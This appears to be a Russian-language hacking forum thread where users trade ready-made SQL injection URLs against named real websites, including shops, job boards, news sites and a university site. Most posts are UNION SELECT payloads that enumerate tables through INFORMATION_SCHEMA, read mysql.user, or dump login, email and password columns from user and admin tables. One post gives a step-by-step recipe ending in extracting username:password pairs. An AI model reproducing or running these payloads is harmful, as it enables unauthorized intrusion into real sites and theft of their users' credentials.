__http://www.shopcom.ru/shop.php?param=comment&a=1&id_shop=-1+union+select+1,2,3,name,mail,password,7,8,9,10,11+from+shop/*
таблица есть, но она просто пустаю...возможно есть какая то другая...у меня такое было...user пустая, зато siteuser с пользователями.
http://gamemag.ru/?act=showart&id=-947+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/* http://www.rba.ru/news/vid_news.php?id=-323+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/* http://www.trubka.net/showsoft.php?id=-1112+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* http://nextaz.com/showsoft.php?id=-5062+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* http://www.neftegaz.ru/kadr/viewvac.php?id=-21497+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users/* http://www.mnl.ru/viewvac.php?id_vakansiya=-27770+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* http://www.joblive.ru/viewvac.php?id=-51229203+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* http://www.elit-dom.com/podrobnee.php?id=-103+union+select+1,2,3,4,5,6,7,8,9,10/* http://www.iriscom.ru/index.php?page_id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* http://www.sdbireras.ru/product_detail.php?id=30&tip=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user/* http://www.cz-usa.com/product_detail.php?id=-28+union+select+1,2,3,4,5,6/* http://www.internaltool.com/products/product_detail.php?series=-81+union+select+1,2/* http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/* http://sportsoptics.pl/product_detail.php?group=scopes&id=-473+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
2 злюка таблица не пустая. Когда пробуешь извлечь что либо оттуда появляется ошибка. Если бы она была пустая, то просто ничего не выводилось бы =) http://research.udmercy.edu/ids/technoclass.php?id=-6+union+select+1,2,column_name,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='user' 2 [ cash ] не вкурил немного =) появляется ошибкаю или может я что то не так делаю?
1) смотрим таблицы Code: http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,table_name,3,4,5,6+from+INFORMATION_SCHEMA.TABLES/* 2)Смотрим кол-во в нужных таблицах. Code: http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+enroll_accounts/* Code: http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+accounts/* Code: http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+user/* 3)Выводим данные. Code: http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,concat(username,char(58),password),3,4,5,6+from+accounts/* что тебя заинтересует я не знаю дальшейших методов взлома много дальше разбирайся сам. in sql i trust )))
Дык я это знаю, не совсем уж ламер =) Просто count(*) from users выводит ошибку, а должна выводится по идее пустая страница
__http://baby.com.ua/hit/school/obj_view_otziv.php3?p=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
надо внести свой вклад http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+1,2,version(),4,user()/*
"за что ни возьмешься"... я ее сам нашел, честно ладно, будем копать дальше.. странно, я сёарчем не нашел этот урл( sorry 4 offtop =\
__http://obec.org.ru/author.php?sort=CommentsThread&sort_type=ASC&pos=0&Id=-1+union+select+1,user(),3,4,5,6,7,8/*
2 _Pantera_ не правда. иногда используя INFORMATION_SCHEMA выводится только одна таблица и тогда надо использовать LIMIT Но здесь почему то не работает
Code: http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15+from+INFORMATION_SCHEMA.TABLES+limit+1,666/* и там по страничкам полистаешь, ог?
Code: http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20/* http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pwd),12,13,14,15,16,17,18,19,20+from+lnkxchange_admins/*